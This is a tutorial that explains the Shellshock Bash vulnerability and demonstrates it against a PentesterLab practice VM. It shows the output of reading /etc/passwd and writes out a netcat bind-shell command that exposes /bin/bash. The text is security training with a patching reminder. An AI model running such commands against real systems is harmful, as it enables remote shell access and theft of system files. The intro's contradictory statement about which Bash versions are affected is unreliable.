Shellshock Explained + Exploitation Tutorial
Introduction
Shellshock is a “code injection attack” that takes advantage of a function definition vulnerability in Bash 4.3 and earlier.
The vulnerability is caused by Bash processing trailing strings after function definitions in the values of environment variables. In Bash 4.3 and later, these trailing strings will not be executed.
Testing
To test if your system is vulnerable, simply run the command below in a Bash shell.
If 'vulnerable' is echoed back, your system is vulnerable, since echo vulnerable is directly after the function definition env x='() { :;};
A response of 'not-vulnerable' indicates your system is not vulnerable to the test above.
Note: Additional tests should be performed to confirm your system is not vulnerable to Shellshock.
These tests can be found on the Shellshocker Website - https://shellshocker.net/
Exploitation
Launch the 'Pentester Lab: CVE-2014-6271 Shellshock' VM (https://pentesterlab.com/exercises/cve-2014-6271) then browse to the VM’s IP in your web-browser.
You will be presented with the output of the [uptime] and [uname -a] Linux commands, running on the Pentesterlab VM.
CVE-2014-6271
This system is running:
uptime: 20:44:15 up 0 min, 1 users, load average: 0.06, 0.01, 0.00
kernel: Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux
View the page source and you’ll notice the location of the CGI (http://www.techrepublic.com/article/cgi-crash-course-how-to-run-cgi-scripts/) script that is executed on the server.
$.getJSON("/cgi-bin/status", function (data) {
Let’s use curl to launch a few shellshock attacks against the status CGI script via the User-Agent string (-A in curl).
Passwd File
user@debian8:~$
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
Directory Listing
bin
boot
dev
etc
home
init
...
Bind Shell
Bind an instance of Bash to a netcat listener on port 2345 and connect.
After executing the bind shell on the Shellshock VM (/usr/bin/nc -lvvp 2345 -e /bin/bash) you will need to open a new terminal window to connect using (nc -vn 192.168.1.14 2345)
user@debian8:~$
(UNKNOWN) [192.168.1.14] 2345 (?) open
[eth0]
Link encap:Ethernet HWaddr 08:00:27:84:1F:23
inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe84:1f23/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:742 errors:0 dropped:0 overruns:0 frame:0
TX packets:426 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:57418 (56.0 KiB) TX bytes:246492 (240.7 KiB)
Interrupt:10 Base address:0xd020
Conclusion
The examples above demonstrate a tiny fraction of what is possible using the Shellshock vulnerability.
Additional attack vectors include:
– OpenSSH server
– DHCP clients
– Qmail server
– IBM HMC restricted shell
If your system is vulnerable, ensure it is patched immediately by upgrading your version of Bash then re-testing.
Tags: shellshock